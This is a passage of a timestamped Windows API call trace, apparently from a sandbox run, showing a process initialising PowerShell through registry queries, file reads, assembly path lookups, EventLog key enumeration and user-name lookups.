	[0062.763] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.763] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.764] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.764] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xd62a23f9, Data2=0xb8d9, Data3=0x412c, Data4=([0]=0xb1, [1]=0x7, [2]=0xd8, [3]=0xe1, [4]=0x62, [5]=0xa9, [6]=0xb9, [7]=0x3b))) returned 0x0
	[0062.765] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xd12c4d57, Data2=0x1632, Data3=0x460e, Data4=([0]=0xa0, [1]=0xa4, [2]=0x51, [3]=0x94, [4]=0x29, [5]=0x1c, [6]=0x42, [7]=0x60))) returned 0x0
	[0062.765] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.765] GetLastError () returned 0x0
	[0062.765] GetFileType (hFile=0x2fc) returned 0x1
	[0062.765] SetErrorMode (uMode=0x1) returned 0x1
	[0062.765] GetFileType (hFile=0x2fc) returned 0x1
	[0062.765] ReadFile (in: hFile=0x2fc, lpBuffer=0x2865064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2865064*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.766] GetLastError () returned 0x0
	[0062.767] ReadFile (in: hFile=0x2fc, lpBuffer=0x2865064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2865064*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.767] GetLastError () returned 0x0
	[0062.767] ReadFile (in: hFile=0x2fc, lpBuffer=0x2865064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2865064*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.767] GetLastError () returned 0x0
	[0062.767] ReadFile (in: hFile=0x2fc, lpBuffer=0x2865064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2865064*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.767] GetLastError () returned 0x0
	[0062.768] ReadFile (in: hFile=0x2fc, lpBuffer=0x2865064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2865064*, lpNumberOfBytesRead=0xae6e4*=0xe98, lpOverlapped=0x0) returned 1
	[0062.768] GetLastError () returned 0x0
	[0062.768] ReadFile (in: hFile=0x2fc, lpBuffer=0x286469c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x286469c*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.768] GetLastError () returned 0x0
	[0062.768] ReadFile (in: hFile=0x2fc, lpBuffer=0x2865064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2865064*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.768] GetLastError () returned 0x0
	[0062.768] CloseHandle (hObject=0x2fc) returned 1
	[0062.768] GetLastError () returned 0x0
	[0062.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2886060 | out: lpFileInformation=0x2886060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0062.769] GetLastError () returned 0x0
	[0062.769] SetErrorMode (uMode=0x1) returned 0x1
	[0062.769] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
	[0062.769] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.769] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.769] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.770] VirtualQuery (in: lpAddress=0xad3c0, lpBuffer=0xae3c0, dwLength=0x1c | out: lpBuffer=0xae3c0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.770] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xe5d74357, Data2=0x3aae, Data3=0x41dd, Data4=([0]=0x8c, [1]=0x90, [2]=0xb, [3]=0x7d, [4]=0x3f, [5]=0x74, [6]=0xa, [7]=0x6b))) returned 0x0
	[0062.770] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xb0c9ac22, Data2=0xb1b, Data3=0x4dab, Data4=([0]=0xba, [1]=0xc7, [2]=0xcb, [3]=0x20, [4]=0x7f, [5]=0xe7, [6]=0x19, [7]=0xe4))) returned 0x0
	[0062.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0062.785] GetLastError () returned 0x57
	[0062.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0062.785] GetLastError () returned 0x57
	[0062.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0062.795] GetLastError () returned 0x57
	[0062.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0062.795] GetLastError () returned 0x57
	[0062.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.799] GetLastError () returned 0x57
	[0062.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.799] GetLastError () returned 0x57
	[0062.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.801] GetLastError () returned 0x57
	[0062.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0062.801] GetLastError () returned 0x57
	[0062.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0062.803] GetLastError () returned 0x57
	[0062.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0062.803] GetLastError () returned 0x57
	[0062.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0062.804] GetLastError () returned 0x57
	[0062.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0062.804] GetLastError () returned 0x57
	[0062.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0062.806] GetLastError () returned 0x57
	[0062.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0062.806] GetLastError () returned 0x57
	[0062.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.810] GetLastError () returned 0xcb
	[0062.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.810] GetLastError () returned 0xcb
	[0062.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.811] GetLastError () returned 0xcb
	[0062.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.811] GetLastError () returned 0xcb
	[0062.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.813] GetLastError () returned 0xcb
	[0062.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.815] GetLastError () returned 0xcb
	[0062.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.816] GetLastError () returned 0xcb
	[0062.817] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xae75c | out: phkResult=0xae75c*=0x2fc) returned 0x0
	[0062.818] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae7ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae7b0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae7ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae7b0*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.818] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x242ad0, lpcchValueName=0xae7d4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xae7d4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0062.818] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x242ad0, lpcchValueName=0xae7d4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xae7d4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0062.818] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x242ad0, lpcchValueName=0xae7d4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xae7d4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0062.819] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0xae7b4, lpData=0x0, lpcbData=0xae7b0*=0x0 | out: lpType=0xae7b4*=0x1, lpData=0x0, lpcbData=0xae7b0*=0x8) returned 0x0
	[0062.819] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0xae7b4, lpData=0x242ad0, lpcbData=0xae7b0*=0x8 | out: lpType=0xae7b4*=0x1, lpData="2.0", lpcbData=0xae7b0*=0x8) returned 0x0
	[0062.852] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xae718 | out: phkResult=0xae718*=0x300) returned 0x0
	[0062.852] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae768, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae76c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae768*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae76c*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.852] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x242ad0, lpcchValueName=0xae790, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xae790, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0062.852] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x242ad0, lpcchValueName=0xae790, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xae790, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0062.852] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x242ad0, lpcchValueName=0xae790, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xae790, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0062.852] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0xae770, lpData=0x0, lpcbData=0xae76c*=0x0 | out: lpType=0xae770*=0x1, lpData=0x0, lpcbData=0xae76c*=0x8) returned 0x0
	[0062.852] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0xae770, lpData=0x242ad0, lpcbData=0xae76c*=0x8 | out: lpType=0xae770*=0x1, lpData="2.0", lpcbData=0xae76c*=0x8) returned 0x0
	[0062.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.858] GetLastError () returned 0xcb
	[0062.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.860] GetLastError () returned 0xcb
	[0062.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6d8 | out: phkResult=0xae6d8*=0x304) returned 0x0
	[0062.864] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae740, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae73c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae740*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae73c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.865] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.865] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.865] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.865] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.865] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.865] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.865] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.866] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.866] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x242ad0, lpcchName=0xae75c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xae75c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.866] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x320) returned 0x0
	[0062.866] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x0) returned 0x2
	[0062.866] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x330) returned 0x0
	[0062.866] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x0) returned 0x2
	[0062.866] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x334) returned 0x0
	[0062.867] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x0) returned 0x2
	[0062.867] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x338) returned 0x0
	[0062.867] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x0) returned 0x2
	[0062.867] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x33c) returned 0x0
	[0062.867] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x0) returned 0x2
	[0062.867] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x340) returned 0x0
	[0062.867] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x0) returned 0x2
	[0062.867] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x344) returned 0x0
	[0062.867] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x0) returned 0x2
	[0062.868] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x348) returned 0x0
	[0062.868] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x0) returned 0x2
	[0062.868] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x34c) returned 0x0
	[0062.868] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae708 | out: phkResult=0xae708*=0x350) returned 0x0
	[0062.868] RegCloseKey (hKey=0x350) returned 0x0
	[0062.868] RegCloseKey (hKey=0x304) returned 0x0
	[0062.869] RegCloseKey (hKey=0x34c) returned 0x0
	[0062.879] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae854 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae854) returned 0x1
	[0062.880] GetLastError () returned 0x3
	[0062.881] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae85c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae85c) returned 1
	[0062.909] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6bc | out: phkResult=0xae6bc*=0x354) returned 0x0
